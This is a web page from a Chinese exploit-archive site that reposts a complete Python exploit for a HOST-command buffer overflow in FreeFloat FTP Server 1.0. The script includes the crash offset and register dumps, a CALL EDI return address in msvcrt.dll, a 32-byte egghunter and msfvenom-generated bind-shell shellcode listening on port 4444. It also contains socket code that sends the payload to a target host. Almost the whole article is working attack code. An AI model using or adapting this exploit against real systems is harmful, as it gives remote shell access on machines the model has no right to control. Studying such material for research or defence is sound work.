首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FreeFloat FTP Server 1.0 HOST Buffer Overflow
来源:https://crowdshield.com 作者:1N3 发布时间:2017-11-08   
#!/usr/bin/python
# Exploit Title: FreeFloat FTP Server HOST Buffer Overflow (ASLR Bypass)
# Date: 11/05/2017
# Exploit Author: 1N3@CrowdShield - https://crowdshield
# Software Link:  http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.00
# Tested on: Windows Vista SP2 Ultimate x86 (ASLR Enabled/DEP disabled)
# CVE : N/A

import socket, time

# CONNECT TO HOST
host = "10.0.0.39"
port = 21

# [*] Exact match at offset 246
#buffer = "HOST " + "\x41" * 246 + "\x42" * 4 + "\x43" * 745 + '\r\n'

# AFTER CRASH
#EAX 00000408
#ECX 001FC700
#EDX 77C45E74 ntdll.KiFastSystemCallRet
#EBX 0000001A
#ESP 01C7FC00 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
#EBP 016D13F0
#ESI 0040A29E FTPServer.0040A29E
#EDI 016D1D1F ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
#EIP 42424242

# !mona suggest
# 0BADF00D  [+] Examining registers
# 0BADF00D      EIP contains normal pattern : 0x41326941 (offset 246)
# 0BADF00D      ESP (0x01d4fc00) points at offset 258 in normal pattern (length 742)
# 0BADF00D      EDI (0x01741d24) points at offset 727 in normal pattern (length 273)

# CALL EDI - msvcrt.dll
#Found commands (All modules), item 5241
# Address=77D918F6
# Disassembly=CALL EDI
# Module Name=C:\Windows\system32\msvcrt.dll

# BIND SHELL
# msfvenom  -p windows/shell_bind_tcp LPORT=4444 -f python -b "\x0a\x00\x0d"
# Payload size: 355 bytes + 4 byte egg = 359 bytes
# Final size of python file: 1710 bytes
bind_shell =  "T00WT00W"
bind_shell += "\xdd\xc2\xbf\x9a\xa8\x28\x21\xd9\x74\x24\xf4\x5d\x33"
bind_shell += "\xc9\xb1\x53\x31\x7d\x17\x83\xc5\x04\x03\xe7\xbb\xca"
bind_shell += "\xd4\xeb\x54\x88\x17\x13\xa5\xed\x9e\xf6\x94\x2d\xc4"
bind_shell += "\x73\x86\x9d\x8e\xd1\x2b\x55\xc2\xc1\xb8\x1b\xcb\xe6"
bind_shell += "\x09\x91\x2d\xc9\x8a\x8a\x0e\x48\x09\xd1\x42\xaa\x30"
bind_shell += "\x1a\x97\xab\x75\x47\x5a\xf9\x2e\x03\xc9\xed\x5b\x59"
bind_shell += "\xd2\x86\x10\x4f\x52\x7b\xe0\x6e\x73\x2a\x7a\x29\x53"
bind_shell += "\xcd\xaf\x41\xda\xd5\xac\x6c\x94\x6e\x06\x1a\x27\xa6"
bind_shell += "\x56\xe3\x84\x87\x56\x16\xd4\xc0\x51\xc9\xa3\x38\xa2"
bind_shell += "\x74\xb4\xff\xd8\xa2\x31\x1b\x7a\x20\xe1\xc7\x7a\xe5"
bind_shell += "\x74\x8c\x71\x42\xf2\xca\x95\x55\xd7\x61\xa1\xde\xd6"
bind_shell += "\xa5\x23\xa4\xfc\x61\x6f\x7e\x9c\x30\xd5\xd1\xa1\x22"
bind_shell += "\xb6\x8e\x07\x29\x5b\xda\x35\x70\x34\x2f\x74\x8a\xc4"
bind_shell += "\x27\x0f\xf9\xf6\xe8\xbb\x95\xba\x61\x62\x62\xbc\x5b"
bind_shell += "\xd2\xfc\x43\x64\x23\xd5\x87\x30\x73\x4d\x21\x39\x18"
bind_shell += "\x8d\xce\xec\xb5\x85\x69\x5f\xa8\x68\xc9\x0f\x6c\xc2"
bind_shell += "\xa2\x45\x63\x3d\xd2\x65\xa9\x56\x7b\x98\x52\x49\x20"
bind_shell += "\x15\xb4\x03\xc8\x73\x6e\xbb\x2a\xa0\xa7\x5c\x54\x82"
bind_shell += "\x9f\xca\x1d\xc4\x18\xf5\x9d\xc2\x0e\x61\x16\x01\x8b"
bind_shell += "\x90\x29\x0c\xbb\xc5\xbe\xda\x2a\xa4\x5f\xda\x66\x5e"
bind_shell += "\xc3\x49\xed\x9e\x8a\x71\xba\xc9\xdb\x44\xb3\x9f\xf1"
bind_shell += "\xff\x6d\xbd\x0b\x99\x56\x05\xd0\x5a\x58\x84\x95\xe7"
bind_shell += "\x7e\x96\x63\xe7\x3a\xc2\x3b\xbe\x94\xbc\xfd\x68\x57"
bind_shell += "\x16\x54\xc6\x31\xfe\x21\x24\x82\x78\x2e\x61\x74\x64"
bind_shell += "\x9f\xdc\xc1\x9b\x10\x89\xc5\xe4\x4c\x29\x29\x3f\xd5"
bind_shell += "\x59\x60\x1d\x7c\xf2\x2d\xf4\x3c\x9f\xcd\x23\x02\xa6"
bind_shell += "\x4d\xc1\xfb\x5d\x4d\xa0\xfe\x1a\xc9\x59\x73\x32\xbc"
bind_shell += "\x5d\x20\x33\x95"

# 32 BYTE EGGHUNTER
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

# CALL EDI - msvcrt.dll
eip = "\xF6\x18\xD9\x77"

buffer = "HOST " + "\x41" * 246 + eip + "\x90" * 10 + bind_shell + "\x90" * 241 + egghunter + '\r\n'

try:
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock.connect((host,port))
	print sock.recv(1024)
	sock.settimeout(10)

	print "Sending buffer..."
	print str(buffer)
	sock.sendto(buffer, (host, port))
	print "Sent!"

except:
	print "socket connection failed!"

time.sleep(1)

print "Done!"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CoolPlayer+ Portable 2.19.6 St
·IBM Lotus Notes Denial Of Serv
·Linux Kernel 4.13 (Ubuntu 17.1
·Microsoft Windows LNK File Cod
·SMPlayer 17.11.0 - '.m3u' Buff
·Mako Server 2.5 Command Inject
·Debut Embedded httpd 1.20 - De
·Geutebrueck GCore GCoreServer.
·Ipswitch WS_FTP Professional <
·Microsoft Internet Explorer 11
·Avaya IP Office (IPO) 10.1 Sof
·Symantec Endpoint Protection 1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved